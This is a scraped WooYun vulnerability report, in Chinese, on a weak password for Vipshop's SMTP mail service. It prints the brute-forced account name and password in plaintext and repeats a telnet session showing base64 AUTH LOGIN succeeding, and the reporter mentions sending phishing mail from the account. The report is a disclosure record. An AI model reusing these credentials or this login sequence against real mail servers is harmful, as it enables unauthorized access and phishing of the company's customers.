唯品会某服务弱口令可能导致重要信息泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078730

漏洞标题：唯品会某服务弱口令可能导致重要信息泄露

漏洞作者： if、so

提交时间：2014-10-09 11:30

修复时间：2014-11-23 11:38

公开时间：2014-11-23 11:38

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-09：细节已通知厂商并且等待厂商处理中
2014-10-09：厂商已经确认，细节仅向厂商公开
2014-10-19：细节向核心白帽子及相关领域专家公开
2014-10-29：细节向普通白帽子公开
2014-11-08：细节向实习白帽子公开
2014-11-23：细节向公众公开

简要描述：

唯品会重要信息泄露，可欺骗钓鱼

详细说明：

唯品会邮件系统开启了25端口（smtp），开启了25端口也就存在了被暴力破解的风险。
暴力破解得到一个邮箱

service@vipshop.com vipshop.123

我擦，这不是唯品会的系统服务邮箱吗，要是那这个去发欺骗，钓鱼邮件，后果。。
下面来验证这个邮箱

提示无法登陆，密码错误。。
思考一会，觉得可能这是一个联系人邮箱，而非域用户，所以登陆失败，因为EXCHANGE是域验证
虽然登陆不上，但是本质改变不了。来介绍下smtp认证。

如今smtp发信基本都用验证
初始有两种打招呼方式 helo ehlo
EHLO
250-SMTP.Mydomain.com Hello [192.168.0.1]
250-8bitmime
250-BINARYMIME
250-VRFY
250-AUTH LOGIN PLAIN CRAM-MD5
250-AUTH=LOGIN
250 OK
验证过程（LOGIN方式）
auth login ---进行用户身份认证 
334 VXNlcm5hbWU6 ---BASE64编码“Username:”
Y29zdGFAYW1heGl0Lm5ldA== ----发送BASE64编码的用户名
334 UGFzc3dvcmQ6 ---BASE64编码"Password:"
MTk4MjIxNA== ---客户端发送BASE64编码的密码
235 auth successfully ---成功

验证成功

telent mail.vipshop.com 25
220 mx1.vipshop.com ESMTP Smtpd; Thu, 9 Oct 2014 10:50:37 +0800
ehlo
250-mx1.vipshop.com Hello [218.90.24.44], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE 104857600
250-DSN
250-AUTH LOGIN PLAIN
250-STARTTLS
250-DELIVERBY
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
c2VydmljZUB2aXBzaG9wLmNvbQ==334 UGFzc3dvcmQ6
dmlwc2hvcC4xMjM=235 2.0.0 OK Authenticated

有这个账号，可以去干很多坏事。

漏洞证明：

telent mail.vipshop.com 25
220 mx1.vipshop.com ESMTP Smtpd; Thu, 9 Oct 2014 10:50:37 +0800
ehlo
250-mx1.vipshop.com Hello [218.90.24.44], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE 104857600
250-DSN
250-AUTH LOGIN PLAIN
250-STARTTLS
250-DELIVERBY
250 HELP
AUTH LOGIN
334 VXNlcm5hbWU6
c2VydmljZUB2aXBzaG9wLmNvbQ==334 UGFzc3dvcmQ6
dmlwc2hvcC4xMjM=235 2.0.0 OK Authenticated

修复方案：

。。

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2014-10-09 15:19

厂商回复：

感谢您对唯品会信息安全的支持！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078730

漏洞标题：唯品会某服务弱口令可能导致重要信息泄露

相关厂商：唯品会

漏洞作者： if、so

提交时间：2014-10-09 11:30

修复时间：2014-11-23 11:38

公开时间：2014-11-23 11:38

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078730

漏洞标题：唯品会某服务弱口令可能导致重要信息泄露

相关厂商：唯品会

漏洞作者： if、so

提交时间：2014-10-09 11:30

修复时间：2014-11-23 11:38

公开时间：2014-11-23 11:38

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-078730"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 if、so@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：